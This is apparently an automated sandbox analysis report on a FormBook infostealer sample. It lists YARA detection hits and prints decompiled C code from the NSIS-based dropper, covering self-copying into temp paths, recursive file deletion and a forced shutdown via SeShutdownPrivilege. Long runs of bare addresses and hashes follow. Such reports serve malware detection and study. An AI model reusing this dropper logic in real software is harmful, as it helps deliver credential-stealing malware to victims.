                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: 5jsdph8p9l_r.exe PID: 5572 Parent PID: 4748

                                                                                          General

                                                                                          Start time:10:03:57
                                                                                          Start date:08/10/2021
                                                                                          Path:C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
                                                                                          Imagebase:0x400000
                                                                                          File size:257790 bytes
                                                                                          MD5 hash:754D58F597C5947D64269AD73F3E38FE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >

                                                                                            Analysis Process: MV ROCKET_PDA.exe PID: 7032 Parent PID: 4456 MV ROCKET_PDA.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F57(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030F9(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403540();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x42ecb4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x42eccc; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F57(5);
											_t119 = E00405F57(6);
											_t67 = E00405F57(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F57(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x42ec3c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x42eccc =  *0x42eccc | 0xffffffff;
										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
										goto L37;
									}
									_t123 = E004056E5(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E0040540F(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t116, "C:\\Users\\hardz\\Desktop") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053F2();
											} else {
												E00405375();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t127);
											}
											E00405BC7(0x42f000,  *(_t129 + 0x20));
											 *0x42f400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x42ec30; // 0x5137d0
												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x428c58);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\hardz\\Desktop\\MV ROCKET_PDA.exe", 0x428c58, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x428c58);
														E00405915(_t149);
														_t93 =  *0x42ec30; // 0x5137d0
														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E00405427(0x428c58);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x42f400 =  *0x42f400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E00405915(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040579B(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t124);
									E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030F9(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EE9(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F57(0xd);
					_t47 = E00405F57(0xb);
					 *0x42ec24 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x42ecd8 = _t47;
					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405BC7("gqjlpjiaybpobgywdcz Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\hardz\\Desktop\\MV ROCKET_PDA.exe\" ";
					E00405BC7(_t125, _t51);
					 *0x42ec20 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\hardz\\Desktop\\MV ROCKET_PDA.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M00434001;
					}
					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                                                            0x0040313b
                                                                                            0x0040313f
                                                                                            0x00403147
                                                                                            0x0040314b
                                                                                            0x00403150
                                                                                            0x00403160
                                                                                            0x00403163
                                                                                            0x0040316a
                                                                                            0x00403171
                                                                                            0x00403171
                                                                                            0x0040316a
                                                                                            0x00403173
                                                                                            0x00403173
                                                                                            0x00403289
                                                                                            0x00403289
                                                                                            0x00403289
                                                                                            0x0040328b
                                                                                            0x0040328d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403222
                                                                                            0x00403225
                                                                                            0x0040322d
                                                                                            0x0040322d
                                                                                            0x00403230
                                                                                            0x00403235
                                                                                            0x00403237
                                                                                            0x00403237
                                                                                            0x00403238
                                                                                            0x00403238
                                                                                            0x0040323d
                                                                                            0x00403240
                                                                                            0x00403279
                                                                                            0x0040327e
                                                                                            0x00403283
                                                                                            0x00403286
                                                                                            0x00403288
                                                                                            0x00403288
                                                                                            0x00403288
                                                                                            0x00000000
                                                                                            0x00403242
                                                                                            0x00403242
                                                                                            0x00403243
                                                                                            0x00403246
                                                                                            0x0040324e
                                                                                            0x00403251
                                                                                            0x00403253
                                                                                            0x00403253
                                                                                            0x00403253
                                                                                            0x00403253
                                                                                            0x00403251
                                                                                            0x00403258
                                                                                            0x0040325e
                                                                                            0x00403266
                                                                                            0x00403269
                                                                                            0x0040326b
                                                                                            0x0040326b
                                                                                            0x0040326b
                                                                                            0x0040326b
                                                                                            0x00403269
                                                                                            0x00403270
                                                                                            0x00403277
                                                                                            0x00403291
                                                                                            0x00403294
                                                                                            0x00403294
                                                                                            0x0040329d
                                                                                            0x004032a2
                                                                                            0x004032a2
                                                                                            0x004032ad
                                                                                            0x004032b3
                                                                                            0x004032b8
                                                                                            0x004032ba
                                                                                            0x004032e0
                                                                                            0x004032e5
                                                                                            0x004032ef
                                                                                            0x004032f6
                                                                                            0x004032fa
                                                                                            0x00403361
                                                                                            0x00403361
                                                                                            0x00403366
                                                                                            0x0040336c
                                                                                            0x00403370
                                                                                            0x00403485
                                                                                            0x0040348b
                                                                                            0x00403528
                                                                                            0x00403528
                                                                                            0x0040352d
                                                                                            0x00403530
                                                                                            0x00403532
                                                                                            0x00403532
                                                                                            0x0040353a
                                                                                            0x0040353a
                                                                                            0x0040349a
                                                                                            0x004034a3
                                                                                            0x004034a5
                                                                                            0x004034aa
                                                                                            0x004034ac
                                                                                            0x004034ae
                                                                                            0x004034b0
                                                                                            0x004034b2
                                                                                            0x004034b4
                                                                                            0x004034b6
                                                                                            0x004034c6
                                                                                            0x004034c8
                                                                                            0x004034ca
                                                                                            0x004034d7
                                                                                            0x004034e6
                                                                                            0x004034ee
                                                                                            0x004034f6
                                                                                            0x004034f6
                                                                                            0x004034ca
                                                                                            0x004034b6
                                                                                            0x004034b2
                                                                                            0x004034fa
                                                                                            0x004034ff
                                                                                            0x00403506
                                                                                            0x00403514
                                                                                            0x00403517
                                                                                            0x0040351d
                                                                                            0x0040351f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403508
                                                                                            0x0040350e
                                                                                            0x00403510
                                                                                            0x00403512
                                                                                            0x00403521
                                                                                            0x00403523
                                                                                            0x00000000
                                                                                            0x00403523
                                                                                            0x00000000
                                                                                            0x00403512
                                                                                            0x00403506
                                                                                            0x0040337f
                                                                                            0x00403386
                                                                                            0x00403386
                                                                                            0x004032fc
                                                                                            0x00403302
                                                                                            0x00403351
                                                                                            0x00403351
                                                                                            0x0040335d
                                                                                            0x00000000
                                                                                            0x0040335d
                                                                                            0x0040330b
                                                                                            0x00403318
                                                                                            0x0040330f
                                                                                            0x00403315
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403317
                                                                                            0x00403317
                                                                                            0x00403317
                                                                                            0x0040331c
                                                                                            0x0040331e
                                                                                            0x00403326
                                                                                            0x00403397
                                                                                            0x00403399
                                                                                            0x004033a0
                                                                                            0x004033a8
                                                                                            0x004033a8
                                                                                            0x004033b3
                                                                                            0x004033b8
                                                                                            0x004033c7
                                                                                            0x004033cb
                                                                                            0x004033cc
                                                                                            0x004033d5
                                                                                            0x004033ce
                                                                                            0x004033ce
                                                                                            0x004033ce
                                                                                            0x004033db
                                                                                            0x004033e1
                                                                                            0x004033e7
                                                                                            0x004033ef
                                                                                            0x004033ef
                                                                                            0x004033fd
                                                                                            0x00403404
                                                                                            0x0040340d
                                                                                            0x00403413
                                                                                            0x00403413
                                                                                            0x0040341f
                                                                                            0x00403425
                                                                                            0x0040342f
                                                                                            0x00403439
                                                                                            0x0040343f
                                                                                            0x00403441
                                                                                            0x00403443
                                                                                            0x00403444
                                                                                            0x00403445
                                                                                            0x0040344a
                                                                                            0x00403456
                                                                                            0x0040345c
                                                                                            0x00403463
                                                                                            0x00403466
                                                                                            0x0040346c
                                                                                            0x0040346c
                                                                                            0x00403463
                                                                                            0x00403441
                                                                                            0x00403470
                                                                                            0x00403476
                                                                                            0x00403476
                                                                                            0x00403476
                                                                                            0x00403479
                                                                                            0x0040347a
                                                                                            0x0040347b
                                                                                            0x0040347b
                                                                                            0x00000000
                                                                                            0x004033c7
                                                                                            0x00403328
                                                                                            0x0040332a
                                                                                            0x00403335
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040333d
                                                                                            0x00403348
                                                                                            0x0040334d
                                                                                            0x00000000
                                                                                            0x0040334d
                                                                                            0x004032c2
                                                                                            0x004032ce
                                                                                            0x004032d3
                                                                                            0x004032d8
                                                                                            0x004032da
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403277
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403227
                                                                                            0x00403227
                                                                                            0x00403227
                                                                                            0x00403228
                                                                                            0x00403228
                                                                                            0x00000000
                                                                                            0x00403227
                                                                                            0x00000000
                                                                                            0x00403178
                                                                                            0x00403179
                                                                                            0x00403185
                                                                                            0x0040318b
                                                                                            0x00000000
                                                                                            0x0040318d
                                                                                            0x0040318f
                                                                                            0x00403196
                                                                                            0x0040319b
                                                                                            0x004031a0
                                                                                            0x004031a7
                                                                                            0x004031ad
                                                                                            0x004031c3
                                                                                            0x004031d3
                                                                                            0x004031d8
                                                                                            0x004031de
                                                                                            0x004031e5
                                                                                            0x004031f8
                                                                                            0x004031fd
                                                                                            0x004031ff
                                                                                            0x00403201
                                                                                            0x00403206
                                                                                            0x00403206
                                                                                            0x00403216
                                                                                            0x0040321c
                                                                                            0x00000000
                                                                                            0x0040321c

                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 00403150
                                                                                            • GetVersion.KERNEL32 ref: 00403156
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                            • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                            • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                            • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                            • GetCommandLineA.KERNEL32(gqjlpjiaybpobgywdcz Setup,NSIS Error), ref: 004031D8
                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00000000), ref: 004031EB
                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00409168), ref: 00403216
                                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                              • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                              • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                            • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                            • ExitProcess.KERNEL32 ref: 00403386
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00000000,00000020), ref: 00403399
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00000000,00000020), ref: 004033A8
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00000000,00000020), ref: 004033B3
                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,00000000,00000020), ref: 004033BF
                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                            • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV ROCKET_PDA.exe,00428C58,00000001), ref: 00403439
                                                                                            • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                            • ExitProcess.KERNEL32 ref: 0040353A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                            • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\MV ROCKET_PDA.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV ROCKET_PDA.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$gqjlpjiaybpobgywdcz Setup$~nsu
                                                                                            • API String ID: 3469842172-1426976639
                                                                                            • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                                                            • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                            • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                                                            • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                            0x004054f7
                                                                                            0x004054fb
                                                                                            0x00405504
                                                                                            0x00405507
                                                                                            0x0040550a
                                                                                            0x00405512
                                                                                            0x00405514
                                                                                            0x00405515
                                                                                            0x00000000
                                                                                            0x00405515
                                                                                            0x00405524
                                                                                            0x00405524
                                                                                            0x00405527
                                                                                            0x0040552a
                                                                                            0x0040553e
                                                                                            0x00405545
                                                                                            0x0040554a
                                                                                            0x0040554c
                                                                                            0x0040555c
                                                                                            0x0040554e
                                                                                            0x00405554
                                                                                            0x00405554
                                                                                            0x00405561
                                                                                            0x00405564
                                                                                            0x0040556f
                                                                                            0x00405575
                                                                                            0x0040557a
                                                                                            0x0040558a
                                                                                            0x0040558c
                                                                                            0x00405592
                                                                                            0x00405595
                                                                                            0x00405598
                                                                                            0x00405655
                                                                                            0x00405655
                                                                                            0x00405659
                                                                                            0x0040565b
                                                                                            0x0040565b
                                                                                            0x0040565b
                                                                                            0x0040565b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040559e
                                                                                            0x0040559e
                                                                                            0x004055a7
                                                                                            0x004055ad
                                                                                            0x004055b2
                                                                                            0x004055b5
                                                                                            0x004055b7
                                                                                            0x004055bb
                                                                                            0x004055bd
                                                                                            0x004055bd
                                                                                            0x004055bb
                                                                                            0x004055c0
                                                                                            0x004055c3
                                                                                            0x004055d6
                                                                                            0x004055d8
                                                                                            0x004055dd
                                                                                            0x004055e4
                                                                                            0x004055fc
                                                                                            0x00405602
                                                                                            0x00405608
                                                                                            0x0040560a
                                                                                            0x0040562f
                                                                                            0x0040560c
                                                                                            0x0040560c
                                                                                            0x00405610
                                                                                            0x00405624
                                                                                            0x00405612
                                                                                            0x00405615
                                                                                            0x0040561d
                                                                                            0x0040561d
                                                                                            0x00405610
                                                                                            0x004055e6
                                                                                            0x004055ec
                                                                                            0x004055ee
                                                                                            0x004055f4
                                                                                            0x004055f4
